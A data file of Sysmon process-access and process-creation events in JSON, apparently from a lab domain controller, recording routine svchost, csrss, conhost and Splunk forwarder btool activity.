{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3702,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3703,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3704,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010FE900500}\r\nTargetProcessId: 4704\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010FE900500}","TargetProcessId":"4704","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3705,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.074\r\nProcessGuid: {E2A3D6B1-1105-5F25-0000-0010B6910500}\r\nProcessId: 4752\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1105-5F25-0000-0010FE900500}\r\nParentProcessId: 4704\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.074","ProcessGuid":"{E2A3D6B1-1105-5F25-0000-0010B6910500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1105-5F25-0000-0010FE900500}","ParentProcessId":"4704","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3706,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-1105-5F25-0000-0010FE900500}\r\nSourceProcessId: 4704\r\nSourceThreadId: 4724\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010B6910500}\r\nTargetProcessId: 4752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010FE900500}","SourceProcessId":"4704","SourceThreadId":"4724","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010B6910500}","TargetProcessId":"4752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3707,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010B6910500}\r\nTargetProcessId: 4752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010B6910500}","TargetProcessId":"4752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3708,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3709,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3710,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
